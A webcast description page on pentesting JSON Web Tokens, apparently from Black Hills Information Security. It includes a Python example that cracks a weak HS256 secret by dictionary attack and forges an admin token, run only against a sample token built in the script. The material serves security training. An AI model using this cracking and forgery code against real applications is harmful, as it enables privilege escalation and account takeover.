Modern Webapp Pentesting: How to Attack a JWT

Join us in the Black Hills InfoSec Discord server here: https://discord.gg/BHIS to keep the security conversation going! Learn modern webapp pentesting with BB King from Antisyphon Training: https://www.antisyphontraining.com/modern-webapp-pentesting-w-bb-king/

Timestamps:
00:00 - Good Morning!
01:50 - What Are JSON Web Tokens?
04:43 - Base64 Vs Base64 URL Encoding
07:58 - The Construction of a JSON Token
10:07 - Use Cases
13:03 - RFCs of Interest
13:26 - Encoded, Not Encrypted
19:58 - The Red Slide
20:39 - OWASP Top Ten Issues
21:01 - Signature Al Gore Rhythms
25:31 - Stanced On Privacy
26:53 - Stanced On Security
28:56 - Cracking
30:20 - Where To Practice
34:58 - Decoding the Payload – DEMO
45:57 - Snooping (Stealing Poorly-Protected Secrets)
53:34 - For Further Study

Description: In this Black Hills Information Security webcast, an excerpt from his upcoming 16-hour Modern Webapp Pentesting course, BB King will talk about what JSON Web Tokens are, why they're so controversial, and how to test for their major weaknesses. Then, using OWASP's Juice Shop as a target, he'll show you a straightforward method for exploiting them that you can use on your own next webapp pentest.
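The chapters above cover base64url decoding, reading a token's payload without any key ("encoded, not encrypted"), and cracking a weak HMAC secret. The following Python is an added example written for this page, not code from the webcast, the slides, or Juice Shop: it decodes a compact JWS, runs an offline dictionary attack against an HS256 signature, and then re-signs a modified payload with the recovered secret. The sample token, the weak secret "secret", and the wordlist are constructed here for the demonstration; only the standard library is used.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url_decode(segment: str) -> bytes:
    """Decode one base64url segment as used in JWTs (RFC 7515, Appendix C).

    base64url swaps '+' '/' for '-' '_' and drops the '=' padding, so the
    padding has to be restored before the standard decoder will accept it.
    """
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data: bytes) -> str:
    """Encode bytes as unpadded base64url."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def decode_jwt(token: str) -> dict:
    """Split a compact JWS into its parts WITHOUT checking the signature.

    This is the 'encoded, not encrypted' point: anyone holding the token can
    read the header and payload; the signature only stops them changing it.
    """
    header_b64, payload_b64, sig_b64 = token.split(".")
    return {
        "header": json.loads(b64url_decode(header_b64)),
        "payload": json.loads(b64url_decode(payload_b64)),
        "signature": b64url_decode(sig_b64),
        # The bytes the HMAC was computed over: header '.' payload, still encoded.
        "signing_input": f"{header_b64}.{payload_b64}".encode("ascii"),
    }


def hs256_sign(signing_input: bytes, secret: bytes) -> bytes:
    """HS256 is just HMAC-SHA256 over the signing input."""
    return hmac.new(secret, signing_input, hashlib.sha256).digest()


def make_hs256_jwt(header: dict, payload: dict, secret: bytes) -> str:
    """Build an HS256 JWT; JSON is serialised compactly, as real issuers do."""
    def enc(obj: dict) -> str:
        return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))

    signing_input = f"{enc(header)}.{enc(payload)}".encode("ascii")
    signature = b64url_encode(hs256_sign(signing_input, secret))
    return f"{signing_input.decode('ascii')}.{signature}"


def crack_hs256_secret(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: re-sign the token's own signing input with
    each candidate secret and compare against the signature it carries."""
    parts = decode_jwt(token)
    if parts["header"].get("alg") != "HS256":
        return None  # this attack only applies to HMAC-signed tokens
    for candidate in wordlist:
        guess = hs256_sign(parts["signing_input"], candidate.encode("utf-8"))
        if hmac.compare_digest(guess, parts["signature"]):
            return candidate
    return None


def forge_with_secret(token: str, secret: str, changes: dict) -> str:
    """With the secret known, alter claims and sign a token the server will accept."""
    parts = decode_jwt(token)
    payload = dict(parts["payload"], **changes)
    return make_hs256_jwt(parts["header"], payload, secret.encode("utf-8"))


# Constructed sample data (not from the webcast): a token an app might issue,
# signed with a deliberately weak secret, and a tiny wordlist containing it.
SAMPLE_TOKEN = make_hs256_jwt(
    {"alg": "HS256", "typ": "JWT"},
    {"sub": "alice", "role": "user", "email": "alice@example.com"},
    b"secret",
)
WORDLIST = ["password", "changeme", "jwtsecret", "secret", "s3cr3t"]

if __name__ == "__main__":
    print("payload (no key needed):", decode_jwt(SAMPLE_TOKEN)["payload"])
    found = crack_hs256_secret(SAMPLE_TOKEN, WORDLIST)
    print("cracked secret:", found)
    if found:
        print("forged admin token:", forge_with_secret(SAMPLE_TOKEN, found, {"role": "admin"}))
```

On a real engagement the wordlist would be a large one such as rockyou, and the same check is what a server-side verifier must do before trusting any claim: if the secret is guessable, every claim in the token is attacker-controlled.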
Slides for this webcast can be found here: https://www.blackhillsinfosec.com/wp-content/uploads/2020/09/SLIDES_WebApp_PenTesting_AttackingJWTs.pdf

Black Hills Infosec Socials
Twitter: https://twitter.com/BHinfoSecurity
Mastodon: https://infosec.exchange/@blackhillsinfosec
LinkedIn: https://www.linkedin.com/company/antisyphon-training
Discord: https://discord.gg/ffzdt3WUDe

Black Hills Infosec Shirts & Hoodies
https://spearphish-general-store.myshopify.com/collections/bhis-shirt-collections

Black Hills Infosec Services
Active SOC: https://www.blackhillsinfosec.com/services/active-soc/
Penetration Testing: https://www.blackhillsinfosec.com/services/
Incident Response: https://www.blackhillsinfosec.com/services/incident-response/

Backdoors & Breaches - Incident Response Card Game
Backdoors & Breaches: https://www.backdoorsandbreaches.com/
Play B&B Online: https://play.backdoorsandbreaches.com/

Antisyphon Training
Pay What You Can: https://www.antisyphontraining.com/pay-what-you-can/
Live Training: https://www.antisyphontraining.com/course-catalog/
On Demand Training: https://www.antisyphontraining.com/on-demand-course-catalog/

Educational Infosec Content
Black Hills Infosec Blogs: https://www.blackhillsinfosec.com/blog/
Wild West Hackin' Fest YouTube: https://www.youtube.com/wildwesthackinfest
Active Countermeasures YouTube: https://youtube.com/activecountermeasures
Antisyphon Training YouTube: https://www.youtube.com/antisyphontraining

Join us at the annual information security conference in Deadwood, SD (in-person and virtually), Wild West Hackin' Fest: https://wildwesthackinfest.com/

#bhis #infosec